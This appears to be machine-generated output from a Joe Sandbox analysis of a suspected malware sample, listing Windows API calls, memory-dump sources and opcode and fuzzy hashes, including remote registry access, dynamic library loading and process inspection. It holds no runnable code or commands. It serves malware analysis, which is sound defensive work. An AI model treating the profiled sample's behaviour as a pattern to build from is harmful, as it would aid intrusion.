                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                            • Opcode ID: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
                                                                                                                            • Instruction ID: b46c799e0b1fe9950c99e2e23d9ac156278f2d9d4eba9f5cd77be016285c7d77
                                                                                                                            • Opcode Fuzzy Hash: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
                                                                                                                            • Instruction Fuzzy Hash: CA218174600609AFDB309F29DC05B9E7BB4EF54720F20862AFDB4D72D0D77099519B60
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C76E89
                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76EBB
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C76ECC
                                                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C76F06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$FilePipe
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 4209266947-2873401336
                                                                                                                            • Opcode ID: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
                                                                                                                            • Instruction ID: bc211b6a0748a718c7267531dec0bbae286b3f01fb9f9b03968064177a87ef9f
                                                                                                                            • Opcode Fuzzy Hash: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
                                                                                                                            • Instruction Fuzzy Hash: 4321A475500B059BDB209F69DC04B9A77A8EF45720F208A1AFCB5D72D0D770A951C761
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C7AC54
                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C7ACA8
                                                                                                                            • __swprintf.LIBCMT ref: 00C7ACC1
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C9F910), ref: 00C7ACFF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                            • String ID: %lu
                                                                                                                            • API String ID: 3164766367-685833217
                                                                                                                            • Opcode ID: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                                                                            • Instruction ID: 0dd710abfd01a30efeac01f0d2be8e2e64b4252dc5ea9f0e922a6566da8e7cc0
                                                                                                                            • Opcode Fuzzy Hash: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                                                                            • Instruction Fuzzy Hash: 6D214131A00109EFCB10DF65C945EEE7BB8FF89714B1080A9F909DB251DA31EA45EB61
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C71B19
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                            • API String ID: 3964851224-769500911
                                                                                                                            • Opcode ID: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                                                                            • Instruction ID: 325e0c32185fd3cf62bd8b7c688d95cec32b3b5e9e564ff6dd13f8e4cbe3fccd
                                                                                                                            • Opcode Fuzzy Hash: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                                                                            • Instruction Fuzzy Hash: F11165719102088FCF00DF54D8519FEB7B4FF65304F148469D81597691EB325D0AEB54
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C8EC07
                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C8EC37
                                                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C8ED6A
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C8EDEB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2364364464-0
                                                                                                                            • Opcode ID: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                                                                            • Instruction ID: a1c40ffcc427b847dc3a32dd9845fcb5373988e337a79a15cc9ac30f828f964c
                                                                                                                            • Opcode Fuzzy Hash: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                                                                            • Instruction Fuzzy Hash: B2819D716043009FE720EF28C896F6AB7E5EF49710F04881DF999DB2D2DAB0AD45DB85
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C900FD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9013C
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C90183
                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C901AF
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C901BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3440857362-0
                                                                                                                            • Opcode ID: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                                                                            • Instruction ID: 8d9112ff371cb0e6d994e0816511e88f9033322b8ae70bdbc6f36c41da57b4e6
                                                                                                                            • Opcode Fuzzy Hash: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                                                                            • Instruction Fuzzy Hash: 3C514C31208204AFDB14EF54C885FAEB7E9FF84314F50491DF555872A2DB31EA45EB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8D927
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C8D9AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8D9C6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C8DA07
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8DA21
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 327935632-0
                                                                                                                            • Opcode ID: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                                                                            • Instruction ID: 3d03bd2e70ec8f26604e02ebc1bd2587399b64cf3e8f0f74a481de30e0b33596
                                                                                                                            • Opcode Fuzzy Hash: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                                                                            • Instruction Fuzzy Hash: 51513935A04205DFCB04EFA8C4849EDB7B4FF49314B148069E856AB352DB31EE85EF91
                                                                                                                            APIs
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C7E61F
                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C7E648
                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C7E687
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C7E6AC
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C7E6B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1389676194-0
                                                                                                                            • Opcode ID: 06571865dd5a212681b8254b38b22840ddf67ffacbe097fe724339c8819c4954
                                                                                                                            • Instruction ID: 4c091bc5549c90bf297f7b8192df18f869baa94a33808e4cb04544a150d19a0d
                                                                                                                            • Opcode Fuzzy Hash: 06571865dd5a212681b8254b38b22840ddf67ffacbe097fe724339c8819c4954
                                                                                                                            • Instruction Fuzzy Hash: 25510D35A00109DFDB01EF64C995AADBBF5EF09314F1480A9E859AB3A1CB31EE51EF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                                                                            • Instruction ID: 50aaca754c58241f503f3c4f02b5b9fa0941a0e7161018cb34afb19a45a13cc7
                                                                                                                            • Opcode Fuzzy Hash: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                                                                            • Instruction Fuzzy Hash: 22418035905214EFDB24DB68CC4DFADBBA4EB09310F150166F926A72E1C730AE51EA91
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C663E7
                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00C66433
                                                                                                                            • TranslateMessage.USER32(?), ref: 00C6645C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C66466
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C66475
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2108273632-0
                                                                                                                            • Opcode ID: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                                                                            • Instruction ID: 41f15b90e7fb93b72399366f221b2650febac687c063a8ac6b911c0cc7142374
                                                                                                                            • Opcode Fuzzy Hash: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                                                                            • Instruction Fuzzy Hash: 1B31A171941646AFDB34CFB1DC88BBABBE8AB01304F14017AE435C31A1EB359989DB60
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C68A30
                                                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00C68ADA
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C68AE2
                                                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00C68AF0
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C68AF8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3382505437-0
                                                                                                                            • Opcode ID: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                                                                            • Instruction ID: 3376c8a3ca939b1530519511bbdf126e4562af1f96b84a4029297ccc54386183
                                                                                                                            • Opcode Fuzzy Hash: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                                                                            • Instruction Fuzzy Hash: 4531C071500219EFDF24CFA8DD8CB9E3BB5EB04315F10822AF925E61D1C7B09A58EB90
                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C6B204
                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C6B221
                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C6B259
                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C6B27F
                                                                                                                            • _wcsstr.LIBCMT ref: 00C6B289
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3902887630-0
                                                                                                                            • Opcode ID: c283f11cb02b32500bacd286dc01f29d5b4a40cef005d87bec96d73abe6d8aee
                                                                                                                            • Instruction ID: 306ad8b03f01aaf23ce46b6e4e8c42a8c82e8ee468c7d566ef2078ce8f714fe5
                                                                                                                            • Opcode Fuzzy Hash: c283f11cb02b32500bacd286dc01f29d5b4a40cef005d87bec96d73abe6d8aee
                                                                                                                            • Instruction Fuzzy Hash: 5721F5322042047BEB255B759C99F7F7BECDF49710F10413EF805DA161EB61DD81A260
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C9B192
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C9B1B7
                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C9B1CF
                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C9B1F8
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C80E90,00000000), ref: 00C9B216
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2294984445-0
                                                                                                                            • Opcode ID: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
                                                                                                                            • Instruction ID: 70a6c01478a465bad18f23899c35bd60c69d953ca5dc4532cb0527e7cf50cbe6
                                                                                                                            • Opcode Fuzzy Hash: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
                                                                                                                            • Instruction Fuzzy Hash: 1E217C71A10655AFCF109F39AD4CB6E3BA4EB05721B11462AF932D71E0E7309E219B90
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C69320
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69352
                                                                                                                            • __itow.LIBCMT ref: 00C6936A
                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69392
                                                                                                                            • __itow.LIBCMT ref: 00C693A3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow$_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2983881199-0
                                                                                                                            • Opcode ID: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
                                                                                                                            • Instruction ID: 8ad0b47535fa49521f0b61547e2ad570b13c8f64c82118c48357fb53bb5bab05
                                                                                                                            • Opcode Fuzzy Hash: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
                                                                                                                            • Instruction Fuzzy Hash: 6121C531704208BBDB20AB658CC9EEE7BBDEB49710F044039F905DB2E1D6B08E56A791
                                                                                                                            APIs
